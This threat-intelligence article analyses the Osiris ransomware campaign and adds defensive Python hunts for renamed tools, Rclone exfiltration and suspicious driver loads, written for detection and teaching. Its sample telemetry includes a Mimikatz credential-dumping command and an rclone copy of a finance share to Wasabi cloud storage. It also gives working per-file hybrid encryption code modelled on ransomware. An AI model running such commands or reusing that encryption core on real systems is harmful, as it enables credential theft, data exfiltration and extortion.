A new ransomware strain, dubbed Osiris, was observed in November 2025 in an attack on a major food service company in Southeast Asia. Security researchers classify it as an entirely new malware family, unrelated to the 2016 ransomware that carried the same name. Its appearance is a further sign of how much tooling and care now go into encryption-based attacks on business operations.
The observed campaign shows the tactics, techniques and procedures (TTPs) of experienced operators. The attackers blended legitimate system utilities and dual-use administration software with custom malware to get into the victim's network, establish persistence and finally deploy the ransomware payload. Because most of that tooling is ordinary Windows or administrative software, this "living off the land" approach produces little that signature-based controls would recognise, which is precisely why it is favoured.
Osiris Ransomware Leverages Living off the Land and Dual-use Tools
Symantec analysts linked the intrusion to previously documented Inc ransomware campaigns through overlapping tradecraft: the same filenames for credential-theft tools and the same data exfiltration method. Before any files were encrypted, the attackers exfiltrated data with Rclone to Wasabi cloud storage buckets. The credential-theft tool was Mimikatz, carried as a renamed binary called kaz.exe, a filename already seen in earlier Inc attacks. Renaming defeats only filename-based detection; the PE version information, the import table and the LSASS memory access the tool depends on are unchanged by a rename.
The threat actors also deployed Netexec (network enumeration and lateral movement), Netscan (network discovery), and a modified build of the Rustdesk remote management software, disguised as WinZip, to keep remote access to the compromised network. Each of these is a legitimate or dual-use tool, so detection has to rest on context: where the binary sits, what it is really called, and whether remote access software is sanctioned in the environment at all.
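The dual-use tooling above is only as stealthy as the telemetry that is checked. The following Python is an added example, not code from the article or from Symantec: it runs two checks over constructed process-creation events with Sysmon Event ID 1 style fields, flagging a renamed binary whose PE OriginalFileName still reads mimikatz.exe or rustdesk.exe, and an rclone copy to an S3-compatible remote such as Wasabi. The event values, the tool-name table and the command lines are assumptions made for the example; the findings are signals to triage, not proof of compromise.

```python
import ntpath
import re

# PE OriginalFileName values of the tools named in the article. A plain rename
# on disk (kaz.exe) leaves the PE version resource intact; a rebuilt or
# stripped binary would not, so treat this as one signal among several.
# Table constructed for this example.
KNOWN_TOOL_NAMES = {
    "mimikatz.exe": "credential dumping (Mimikatz)",
    "rustdesk.exe": "remote access tool (Rustdesk)",
    "netscan.exe": "network discovery (Netscan)",
}

# rclone sub-commands that move data off the host.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Wasabi's S3-compatible endpoints live under wasabisys.com; ":s3:" is rclone's
# on-the-fly remote syntax and --s3-endpoint overrides the endpoint.
S3_MARKERS = re.compile(r"wasabisys\.com|(^|\s):s3:|--s3-endpoint", re.I)
# A configured remote as destination looks like "name:bucket/path"; drive
# letters ("D:\...") are excluded by the character after the colon.
REMOTE_DEST = re.compile(r"(^|\s)[A-Za-z0-9_-]+:[^\s\\/]")


def check_process_event(ev):
    """Return [(rule, severity, detail)] for one Sysmon-EID-1-style event dict."""
    findings = []
    image = ntpath.basename(ev.get("Image", "")).lower()
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")

    # Rule 1: the name on disk differs from the name compiled into the PE.
    if original and original not in ("?", image):
        if original in KNOWN_TOOL_NAMES:
            findings.append(("renamed_tool", "high",
                             f"{image} is {original}: {KNOWN_TOOL_NAMES[original]}"))
        else:
            findings.append(("renamed_binary", "low", f"{image} is {original}"))

    # Rule 2: rclone copying data to a remote; S3-compatible targets rank higher.
    if "rclone.exe" in (image, original):
        tokens = cmd.split()
        if RCLONE_VERBS.intersection(tokens) and (
                S3_MARKERS.search(cmd) or REMOTE_DEST.search(cmd)):
            severity = "high" if S3_MARKERS.search(cmd) else "medium"
            findings.append(("rclone_exfil", severity, cmd))

    return findings


def hunt(events):
    """Map each flagged event's Image to its findings; clean events are dropped."""
    results = {}
    for ev in events:
        findings = check_process_event(ev)
        if findings:
            results[ev["Image"]] = findings
    return results


# Constructed sample telemetry for this example, not real events.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\kaz.exe", "OriginalFileName": "mimikatz.exe",
     "CommandLine": r'kaz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Image": r"C:\ProgramData\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Shares\Finance :s3:acme-backup "
                    r"--s3-endpoint s3.wasabisys.com -q --transfers 32"},
    {"Image": r"C:\Users\Public\WinZip.exe", "OriginalFileName": "rustdesk.exe",
     "CommandLine": r"C:\Users\Public\WinZip.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for image, findings in hunt(SAMPLE_EVENTS).items():
        for rule, severity, detail in findings:
            print(f"[{severity}] {rule}: {image} -> {detail}")
```

The OriginalFileName comparison is the cheapest of the three checks and the first one an attacker who rebuilds the tool will break, so the rclone rule keys on behaviour (a copy verb plus a remote destination) rather than on the binary name.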
Exploitation of Malicious Drivers and Defense Bypass
A particularly concerning aspect of the campaign is the deployment of a malicious kernel driver known as Poortry (also tracked as Abyssworker), which masqueraded as legitimate Malwarebytes software so that it would look innocuous to administrators. The driver is used to disable security software from kernel mode, in the style of a bring-your-own-vulnerable-driver (BYOVD) attack. Strictly, the technique differs: classic BYOVD loads a legitimate but exploitable signed driver and abuses its flaws, whereas Poortry is a purpose-built malicious driver that must itself carry a signature Windows will accept, or be loaded with driver signature enforcement disabled. Either way, installing a driver already requires administrator rights, so the gain is not privilege escalation in the usual sense but kernel-mode code execution, which lets the attacker terminate protected security processes without the user-mode alerts a normal kill attempt would raise. Driver-based EDR killers of this kind have become a preferred method for ransomware operators. The controls a practitioner should verify are Microsoft's vulnerable driver blocklist (enabled by default on Windows 11 since the 2022 Update and wherever HVCI is on), a WDAC policy restricting which drivers may load, and alerting on kernel driver service installations (System Event ID 7045, Sysmon Event ID 6) from paths outside the Windows driver directories.
Poortry is notable because it was written by the attackers themselves rather than being a legitimate vendor's driver with an exploitable flaw. The effort involved, including whatever was needed to get the driver signed or loaded, points to a group willing to invest in its own attack infrastructure.
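One concrete check a defender can run against driver-load telemetry, as an added example and not code from the article or from Symantec: flag a kernel driver load when the file is on a hash blocklist, is unsigned or carries a signature that is not valid, lives outside the Windows driver directories, or claims a security vendor in its path that its signer does not back. The events, hash values and vendor table are constructed for this example. A driver signed through Microsoft's hardware compatibility program shows Microsoft as the signer, so the vendor-claim check alone would not catch such a case; that is why the path and hash checks carry weight of their own.

```python
import re

# SHA256 values an organisation wants blocked. Placeholder values constructed
# for this example; a real list would be fed from Microsoft's vulnerable
# driver blocklist or loldrivers.io.
BLOCKED_SHA256 = {"0f1e2d3c" * 8}

# Legitimate kernel drivers are installed under these roots.
DRIVER_ROOTS = ("c:\\windows\\system32\\drivers\\",
                "c:\\windows\\system32\\driverstore\\")

# Vendor a driver claims through its path or filename -> substring expected in
# the signer subject if that claim is genuine. Constructed for this example.
VENDOR_CLAIMS = {"malwarebytes": "malwarebytes", "mbam": "malwarebytes"}


def sha256_of(hashes_field):
    """Pull the SHA256 out of Sysmon's 'SHA256=...,MD5=...' Hashes field."""
    m = re.search(r"SHA256=([0-9a-fA-F]{64})", hashes_field or "")
    return m.group(1).lower() if m else None


def check_driver_load(ev):
    """Return [(rule, severity)] for one Sysmon Event ID 6 style event dict."""
    findings = []
    path = ev.get("ImageLoaded", "").lower()
    signed = ev.get("Signed", "").lower() == "true"
    signer = ev.get("Signature", "").lower()
    status = ev.get("SignatureStatus", "").lower()

    if sha256_of(ev.get("Hashes")) in BLOCKED_SHA256:
        findings.append(("blocklisted_driver", "critical"))
    if not signed:
        # Should be impossible with driver signature enforcement on; if such a
        # driver loads, DSE was disabled or test signing is on, an alert itself.
        findings.append(("unsigned_driver", "high"))
    elif status != "valid":
        findings.append(("signature_not_valid", "medium"))
    if not path.startswith(DRIVER_ROOTS):
        findings.append(("driver_outside_driver_roots", "high"))
    for claim, vendor in VENDOR_CLAIMS.items():
        if claim in path and vendor not in signer:
            findings.append(("vendor_claim_not_backed_by_signer", "high"))
            break
    return findings


def hunt_driver_loads(events):
    """Map each flagged driver path to its findings; clean loads are dropped."""
    results = {}
    for ev in events:
        findings = check_driver_load(ev)
        if findings:
            results[ev["ImageLoaded"]] = findings
    return results


# Constructed sample telemetry for this example, not real events or drivers.
SAMPLE_DRIVER_LOADS = [
    {"ImageLoaded": r"C:\ProgramData\Malwarebytes\mbamkrnl.sys",
     "Signed": "true",
     "Signature": "Microsoft Windows Hardware Compatibility Publisher",
     "SignatureStatus": "Valid",
     "Hashes": "SHA256=" + "0f1e2d3c" * 8},
    {"ImageLoaded": r"C:\Windows\Temp\drv.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
     "Hashes": "SHA256=" + "ab" * 32},
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows",
     "SignatureStatus": "Valid", "Hashes": "SHA256=" + "cd" * 32},
]

if __name__ == "__main__":
    for path, findings in hunt_driver_loads(SAMPLE_DRIVER_LOADS).items():
        print(path, findings)
```

Severity is deliberately additive: a driver that is blocklisted, sits in ProgramData and claims a vendor its signer does not match produces three findings, which is the shape a Poortry-style load would take in this telemetry.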
Osiris itself uses a hybrid scheme: Elliptic Curve Cryptography (ECC) protects the file keys and AES-128-CTR encrypts the file contents. Every file gets its own key, so a key recovered for one file (from memory, for example) unlocks nothing else, and because the per-file keys are tied to the operator's ECC public key, none of them can be reconstructed without the matching private key, which never has to exist on the victim machine. To remove the easy recovery paths, the ransomware stops database and backup services (so their files are no longer locked and can be encrypted) and deletes volume shadow copies. Shadow copy deletion, which ransomware generally performs through vssadmin, WMI or the VSS API, and a burst of service stops are reliable detections, but they fire seconds before encryption starts; the earlier signals described above (credential dumping, Rclone exfiltration, unsanctioned remote access software) are where there is still time to act. These capabilities, together with the attack chain as a whole, strongly suggest experienced operators are behind the new Osiris family.
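To make the per-file key point concrete, here is the standard hybrid construction in Python using the cryptography library. It is an added illustration, not Osiris code: the article states only that ECC and AES-128-CTR are combined with a unique key per file, so the curve (X25519), the key derivation (HKDF-SHA256) and the footer layout below are assumptions. The operator's public key is all the encryptor needs, and a key recovered for one file decrypts only that file.

```python
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import (
    X25519PrivateKey, X25519PublicKey)
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

NONCE_LEN = 16   # CTR mode needs a 16-byte initial counter block
PUB_LEN = 32     # raw X25519 public key
KEY_LEN = 16     # AES-128


def make_operator_keypair():
    """The long-term ECC pair. Only the public half ships inside an encryptor."""
    priv = X25519PrivateKey.generate()
    return priv, priv.public_key()


def raw_public(pub):
    return pub.public_bytes(serialization.Encoding.Raw,
                            serialization.PublicFormat.Raw)


def derive_file_key(shared_secret, eph_pub_raw):
    """Assumed KDF: HKDF-SHA256, bound to this file's ephemeral public key."""
    return HKDF(algorithm=hashes.SHA256(), length=KEY_LEN, salt=None,
                info=b"demo-hybrid-file-key" + eph_pub_raw).derive(shared_secret)


def encrypt_blob(plaintext, operator_pub):
    """Encrypt one file's bytes under a fresh key wrapped to the operator key."""
    eph_priv = X25519PrivateKey.generate()            # new per file
    eph_pub_raw = raw_public(eph_priv.public_key())
    key = derive_file_key(eph_priv.exchange(operator_pub), eph_pub_raw)
    nonce = os.urandom(NONCE_LEN)
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    ciphertext = enc.update(plaintext) + enc.finalize()
    # Footer (assumed layout): nonce + ephemeral public key. Nothing in it
    # helps anyone who lacks the operator's private key.
    return ciphertext + nonce + eph_pub_raw


def split_blob(blob):
    footer = NONCE_LEN + PUB_LEN
    return blob[:-footer], blob[-footer:-PUB_LEN], blob[-PUB_LEN:]


def recover_file_key(blob, operator_priv):
    """What the operator's decryptor does: ECDH with the private key, then KDF."""
    _, _, eph_pub_raw = split_blob(blob)
    shared = operator_priv.exchange(X25519PublicKey.from_public_bytes(eph_pub_raw))
    return derive_file_key(shared, eph_pub_raw)


def decrypt_with_file_key(blob, key):
    """Decrypt one file given its own AES key, e.g. one carved from memory."""
    ciphertext, nonce, _ = split_blob(blob)
    dec = Cipher(algorithms.AES(key), modes.CTR(nonce)).decryptor()
    return dec.update(ciphertext) + dec.finalize()


def decrypt_blob(blob, operator_priv):
    return decrypt_with_file_key(blob, recover_file_key(blob, operator_priv))


if __name__ == "__main__":
    operator_priv, operator_pub = make_operator_keypair()
    a = encrypt_blob(b"invoice-2025-11.xlsx contents", operator_pub)
    b = encrypt_blob(b"payroll.db contents", operator_pub)
    key_a = recover_file_key(a, operator_priv)
    key_b = recover_file_key(b, operator_priv)
    print("distinct per-file keys:", key_a != key_b)
    print("own key decrypts:",
          decrypt_with_file_key(a, key_a) == b"invoice-2025-11.xlsx contents")
    print("other file's key fails:",
          decrypt_with_file_key(b, key_a) != b"payroll.db contents")
```

The two things a recovery effort would need are visible in the code: either the operator's private key, which the victim never held, or each file's own AES key, which exists only transiently in the encryptor's memory while that one file is processed.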
The continued shift toward living-off-the-land tooling and kernel-level defense evasion such as BYOVD means detection cannot depend on recognising malware alone. The practical priorities follow directly from this incident: control which dual-use tools (Rclone, remote access software, network scanners) may run, enforce the vulnerable driver blocklist and restrict where drivers may load from, alert on renamed binaries and on data leaving for unsanctioned cloud storage, and keep backups that cannot be reached from the compromised network.